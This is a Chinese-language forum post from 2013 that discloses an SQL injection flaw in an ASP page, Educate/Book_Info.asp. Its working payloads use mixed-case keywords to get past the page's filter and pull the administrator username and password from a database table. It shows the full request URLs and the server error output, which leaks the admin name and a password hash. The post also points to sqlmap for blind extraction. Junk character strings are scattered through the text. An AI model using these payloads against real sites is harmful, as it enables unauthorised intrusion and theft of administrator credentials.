漏洞出现在Educate/Book_Info.asp . t Z4 K2 v+ |; Q
6 U. |# X! j$ w" g4 @# N, a此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出, M8 Y1 [( q, t" [$ d
& s0 N) z; \9 K$ ]. G
exp:如下
" E! X# M8 a$ {' L- y查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
1 ~* y: A0 L6 y1 m+ Y, X! \查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
3 h- b; ?) K4 {% m ; R( {8 j5 T4 i* Z" j4 }
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
- E0 t/ E' C$ | 5 V' y+ D$ y$ j! u( E. e2 |
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'; [7 }% ^ o' Q' R0 B) f
2 F( w" r' ]/ F. @. f4 j8 X将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。) V* D* r+ x0 A$ A8 y9 g
5 f6 b5 r8 ?/ N* l( G+ H/ F* ~/Educate/Book_Info.asp,行 8! H# h4 w, X9 A% A
' _+ I$ h6 Y l* n, k0 q" {" Z
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
; a( `) L$ z: o( e0 C9 ^! v5 M
5 s7 w( b. Q' G& d2 \$ KMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
7 H1 A' }" W) i8 R8 @/ x$ c3 q. `
- ~ Q/ a/ h5 ?6 F将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
K, |( G9 Q9 s) H6 u 4 B) A+ U2 s9 x( D8 Z: K
/Educate/Book_Info.asp,行 8- p x, ]' k' b$ l
|
发表于 2013-2-16 21:44:16
收藏
支持
反对